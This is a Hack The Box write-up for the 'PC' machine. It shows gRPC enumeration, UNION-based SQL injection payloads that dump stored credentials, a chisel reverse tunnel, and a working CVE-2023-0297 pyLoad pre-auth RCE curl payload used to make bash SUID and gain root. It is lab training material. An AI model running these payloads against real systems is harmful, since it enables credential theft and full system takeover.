# PC - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

PC is a nice, easy-rated HTB machine created by [sau123](https://app.hackthebox.com/users/201596)

For user, we were expected to exploit union injection over gRPC.  
Root involves exploiting CVE-2023-0297, a pre-auth RCE vulnerability in `pyLoad`.

## Initial recon

```console
opcode@parrot$ nmap -v -p- --min-rate 2000 10.10.11.214
Nmap scan report for 10.10.11.214
Host is up (0.15s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
50051/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 22,50051 -oN pc.nmap 10.10.11.214
Nmap scan report for 10.10.11.214
Host is up (0.16s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA)
|   256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA)
|_  256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519)
50051/tcp open  unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The SSH (22) port and a mystery port (50051) are open.

## Interacting with gRPC

Since `nmap` failed to recognize the service on port 50051, I tried using `nc` to "talk" to it.  
It took a while, but I did get an error:

```console
opcode@parrot$ nc 10.10.11.214 50051 | xxd
00000000: 0000 1804 0000 0000 0000 0400 3fff ff00  ............?...
00000010: 0500 3fff ff00 0600 0020 00fe 0300 0000  ..?...... ......
00000020: 0100 0004 0800 0000 0000 003f 0000 0000  ...........?....
00000030: 4007 0000 0000 0000 0000 0000 0000 0244  @..............D
00000040: 6964 206e 6f74 2072 6563 6569 7665 2048  id not receive H
00000050: 5454 502f 3220 7365 7474 696e 6773 2062  TTP/2 settings b
00000060: 6566 6f72 6520 6861 6e64 7368 616b 6520  efore handshake 
00000070: 7469 6d65 6f75 74                        timeout
```

I also explored other tools (e.g. `openssl s_client`), but they didn't lead to anything.  
I googled `"did not receive HTTP/2 settings before handshake"` with quotes, and the first result was <https://github.com/grpc/grpc/blob/master/src/core/ext/transport/chttp2/server/chttp2_server.cc>  
It seems to be a gRPC service.

I am unfamiliar with gRPC, so I used <https://grpc.io/docs/what-is-grpc/introduction/> to grasp the basics. I also found another resource that explains protocol buffers: <https://protobuf.dev/overview/>

After going over the text, I tried following <https://grpc.io/docs/languages/python/quickstart/> and <https://grpc.io/docs/languages/python/basics/>

```console
opcode@parrot$ python3 -m pip install --upgrade pip
opcode@parrot$ python3 -m pip install grpcio
opcode@parrot$ python3 -m pip install grpcio-tools
```

I picked a toy application from <https://github.com/grpc/grpc/tree/master/examples/python> and set it up locally.  
To interact with gRPC, knowing the `proto` file is a prerequisite.  
Hence, I reached a standstill and asked ChatGPT for help:

![1](images/1.png)

> To interact with a gRPC server without knowing the protobuf (proto) file, you can use the Reflection API provided by gRPC. The Reflection API allows clients to dynamically discover the available services and their methods on a gRPC server.

It also included code but used invalid function names.  
Instead, I used code from <https://github.com/grpc/grpc/blob/master/doc/python/server_reflection.md>

The module `grpcio-reflection` is a prerequisite:

```console
opcode@parrot$ python3 -m pip install grpcio-reflection
```

Next, I created `client.py`:

```py
import grpc
from grpc_reflection.v1alpha.proto_reflection_descriptor_database import ProtoReflectionDescriptorDatabase

channel = grpc.insecure_channel('10.10.11.214:50051')

reflection_db = ProtoReflectionDescriptorDatabase(channel)
services = reflection_db.get_services()
print(services)
```

```console
opcode@parrot$ python3 client.py
['SimpleApp', 'grpc.reflection.v1alpha.ServerReflection']
```

The result is unusual. I'm guessing that the reflection on server is registered in an unusual manner to return `name` instead of `full_name`.  
Either that or `package_name` is set to null.

Next, I modified the script to enumerate methods:

```py
import grpc
from grpc_reflection.v1alpha.proto_reflection_descriptor_database import ProtoReflectionDescriptorDatabase
from google.protobuf.descriptor_pool import DescriptorPool


channel = grpc.insecure_channel('10.10.11.214:50051')

reflection_db = ProtoReflectionDescriptorDatabase(channel)
services = reflection_db.get_services()
desc_pool = DescriptorPool(reflection_db)
service_desc = desc_pool.FindServiceByName(services[1])


for method in service_desc.methods:
    print(method.full_name)
```

It works for `grpc.reflection.v1alpha.ServerReflection`, but when I tried `SimpleApp`, it failed with the error:

```text
KeyError: "Couldn't find service SimpleApp"
```

I set up a gRPC server with reflection locally, and it had no such error. Surely, it is the issue with `name`.  
I considered brute forcing for the `package name`, but a friend speculated that the implementation for `python` client is not as mature and asked me to use the `golang` client instead.

This [gRPC Server Reflection Tutorial](https://chromium.googlesource.com/external/github.com/grpc/grpc-go/+/HEAD/Documentation/server-reflection-tutorial.md) talks about `gRPCurl`, built with `golang`.

```console
opcode@parrot$ grpcurl -plaintext 10.10.11.214:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection
```

```console
opcode@parrot$ grpcurl -plaintext 10.10.11.214:50051 list SimpleApp
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo
```

It was able to find three methods.

Next, I wanted to use the `describe` command, but it needed `full_name` (`<package_name>.<service_name>.<method_name>`)  
`package_name` is not known, but somehow, using only the `service_name` worked:

```console
opcode@parrot$ grpcurl -plaintext 10.10.11.214:50051 describe SimpleApp        
SimpleApp is a service:
service SimpleApp {
  rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );
  rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );
  rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );
}
```

To inspect message type, we need `<package_name>.<type>`, but this one, too, worked with just the `<type>`:

```console
opcode@parrot$ grpcurl -plaintext 10.10.11.214:50051 describe LoginUserRequest
LoginUserRequest is a message:
message LoginUserRequest {
  string username = 1;
  string password = 2;
}
opcode@parrot$ grpcurl -plaintext 10.10.11.214:50051 describe LoginUserResponse
LoginUserResponse is a message:
message LoginUserResponse {
  string message = 1;
}
opcode@parrot$ grpcurl -plaintext 10.10.11.214:50051 describe RegisterUserRequest
RegisterUserRequest is a message:
message RegisterUserRequest {
  string username = 1;
  string password = 2;
}
opcode@parrot$ grpcurl -plaintext 10.10.11.214:50051 describe RegisterUserResponse
RegisterUserResponse is a message:
message RegisterUserResponse {
  string message = 1;
}
opcode@parrot$ grpcurl -plaintext 10.10.11.214:50051 describe getInfoRequest
getInfoRequest is a message:
message getInfoRequest {
  string id = 1;
}
opcode@parrot$ grpcurl -plaintext 10.10.11.214:50051 describe getInfoResponse              
getInfoResponse is a message:
message getInfoResponse {
  string message = 1;
}
```

Now I have enough information to interact with the server:

```console
opcode@parrot$ grpcurl -plaintext -format text -d 'username: "opcode", password: "opcode"' 10.10.11.214:50051 SimpleApp.RegisterUser
message: "Account created for user opcode!"
```

```console
opcode@parrot$ grpcurl -plaintext -format text -d 'username: "opcode", password: "opcode"' 10.10.11.214:50051 SimpleApp.LoginUser
message: "Your id is 839."
```

```console
opcode@parrot$ grpcurl -plaintext -format text -d 'id: "839"' 10.10.11.214:50051 SimpleApp.getInfo
message: "Authorization Error.Missing 'token' header"
```

I also learnt that `admin:admin` is valid:

```console
opcode@parrot$ grpcurl -plaintext -format text -d 'username: "admin", password: "admin"' 10.10.11.214:50051 SimpleApp.LoginUser
message: "Your id is 346."
```

I had not received any `token`, though. I tried the verbose option on a whim and found it:

```console
opcode@parrot$ grpcurl -v -plaintext -format text -d 'username: "admin", password: "admin"' 10.10.11.214:50051 SimpleApp.LoginUser 

Resolved method descriptor:
rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );

Request metadata to send:
(empty)

Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

Response contents:
message: "Your id is 816."

Response trailers received:
token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE'
Sent 1 request and received 1 response
```

With the token, I was able to use `getInfo`:

```console
opcode@parrot$ grpcurl -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE' -plaintext -format text -d 'id: "816"' 10.10.11.214:50051 SimpleApp.getInfo 
message: "Will update soon."
```

It is a dead end as far as intended functionality is concerned.  
Instead, testing for injections in `id` led to the discovery of SQL injection:

```console
opcode@parrot$ grpcurl -v -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE' -plaintext -format text -d 'id: "816 or 1=1-- -"' 10.10.11.214:50051 SimpleApp.getInfo 

Resolved method descriptor:
rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );

Request metadata to send:
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE

Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

Response contents:
message: "Will update soon."

Response trailers received:
(empty)
Sent 1 request and received 1 response
```

## Union injection for gRPC

```console
opcode@parrot$ grpcurl -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE' -plaintext -format text -d 'id: "816 union select 1-- -"' 10.10.11.214:50051 SimpleApp.getInfo 
message: "1"
```

There is only 1 column in the query.  
I tried enumerating the database next:

```console
opcode@parrot$ grpcurl -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE' -plaintext -format text -d 'id: "816 union select @@version-- -"' 10.10.11.214:50051 SimpleApp.getInfo
ERROR:
  Code: Unknown
  Message: Unexpected <class 'TypeError'>: bad argument type for built-in operation
```

I got the same result with `version()`. On the other hand,

```console
opcode@parrot$ grpcurl -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE' -plaintext -format text -d 'id: "816 union select sqlite_version()-- -"' 10.10.11.214:50051 SimpleApp.getInfo
message: "3.31.1"
```

Hence, the DBMS is SQLite.  
Next, I looked at the tables:

```console
opcode@parrot$ grpcurl -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE' -plaintext -format text -d 'id: "816 union select group_concat(tbl_name) from sqlite_master WHERE type=\"table\"-- -"' 10.10.11.214:50051 SimpleApp.getInfo
message: "accounts,messages"
```

The "accounts" table is interesting. It is possible to dump the schema:

```console
opcode@parrot$ grpcurl -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE' -plaintext -format text -d 'id: "816 union select sql from sqlite_master where tbl_name=\"accounts\"-- -"' 10.10.11.214:50051 SimpleApp.getInfo 
message: "None"
```

Oddly, it returned "None". It worked when I used `group_concat(sql)` instead of `sql`:

```console
opcode@parrot$ grpcurl -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE' -plaintext -format text -d 'id: "816 union select group_concat(sql) from sqlite_master where tbl_name=\"accounts\"-- -"' 10.10.11.214:50051 SimpleApp.getInfo
message: "CREATE TABLE \"accounts\" (\n\tusername TEXT UNIQUE,\n\tpassword TEXT\n)"
```

Also,

```console
opcode@parrot$ grpcurl -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE' -plaintext -format text -d 'id: "816 union select group_concat(sql) from sqlite_master where tbl_name=\"messages\"-- -"' 10.10.11.214:50051 SimpleApp.getInfo
message: "CREATE TABLE messages(id INT UNIQUE, username TEXT UNIQUE,message TEXT)"
```

I dumped the tables next:

```console
opcode@parrot$ grpcurl -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE' -plaintext -format text -d 'id: "816 union select group_concat(username||\":\"||password) from accounts-- -"' 10.10.11.214:50051 SimpleApp.getInfo
message: "admin:admin,sau:HereIsYourPassWord1431"
```

```console
opcode@parrot$ grpcurl -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkzNDY3OTN9.vjXfC8wbw3rvU4EJv4sAzlxyRpKpF0g1VT2Wg06HqmE' -plaintext -format text -d 'id: "816 union select group_concat(id||\":\"||username||\":\"||message) from messages-- -"' 10.10.11.214:50051 SimpleApp.getInfo
message: "1:admin:The admin is working hard to fix the issues."
```

I tried the credentials from "accounts" table on SSH, and they worked:

```console
opcode@parrot$ sshpass -p 'HereIsYourPassWord1431' ssh -o StrictHostKeyChecking=no sau@10.10.11.214
```

## Pre-auth RCE vulnerability in `pyLoad`

I transferred [miniss](https://github.com/noraj/miniss) to the box and ran it:

```console
sau@pc:~$ ./miniss 
type local address   remote address    state       username (uid)
tcp  127.0.0.1:8000  0.0.0.0:0         LISTEN      root (0)
tcp  0.0.0.0:9666    0.0.0.0:0         LISTEN      root (0)
tcp  127.0.0.53:53   0.0.0.0:0         LISTEN      systemd-resolve (101)
tcp  0.0.0.0:22      0.0.0.0:0         LISTEN      root (0)
tcp  10.10.11.214:22 10.10.14.98:38340 ESTABLISHED root (0)
tcp  [::]:50051      [::]:0            LISTEN      root (0)
tcp  [::]:22         [::]:0            LISTEN      root (0)
udp  127.0.0.53:53   0.0.0.0:0         CLOSE       systemd-resolve (101)
udp  0.0.0.0:68      0.0.0.0:0         CLOSE       root (0)
```

Services are running on ports 8000 and 9666 with root privileges.  
I transferred [chisel](https://github.com/jpillora/chisel) to the box to forward these ports.  

On my system, I ran:

```console
opcode@parrot$ ./chisel server -p 9999 --reverse -v
```

And on the box:

```console
sau@pc:~$ ./chisel client 10.10.14.98:9999 R:8000:127.0.0.1:8000 R:9666:127.0.0.1:9666
```

I visited <http://127.0.0.1:8000> and <http://127.0.0.1:9666>, and they both point to the same service: `pyLoad` web interface  
`pyLoad` is an open-source Download Manager written in pure Python.  
Googling "pyload exploit", I learnt that it was vulnerable to a pre-auth RCE vulnerability:  
<https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad>

```console
sau@pc:~$ pyload --version
pyLoad 0.5.0
```

This version is vulnerable.  
The GitHub page contains a neat PoC.

```console
opcode@parrot$ curl -X POST 'http://127.0.0.1:8000/flash/addcrypted2' -d 'jk=pyimport%20os;os.system("touch%20/tmp/pwnd");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
```

It worked:

```console
opcode@parrot$ sau@pc:~$ ls -la /tmp/pwnd
-rw-r--r-- 1 root root 0 Jul 14 13:51 /tmp/pwnd
```

I modified the payload to make `bash` a SUID binary.:

```console
opcode@parrot$ curl -X POST 'http://127.0.0.1:8000/flash/addcrypted2' -d 'jk=pyimport%20os;os.system("chmod%20u%2Bs%20/usr/bin/bash");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
```

It worked as intended:

```console
sau@pc:~$ ls -la /usr/bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18  2022 /usr/bin/bash
```

Therefore, I ran it with `-p` option to not drop the effective user id:

```console
sau@pc:~$ bash -p
bash-5.0# id
uid=1001(sau) gid=1001(sau) euid=0(root) groups=1001(sau)
```
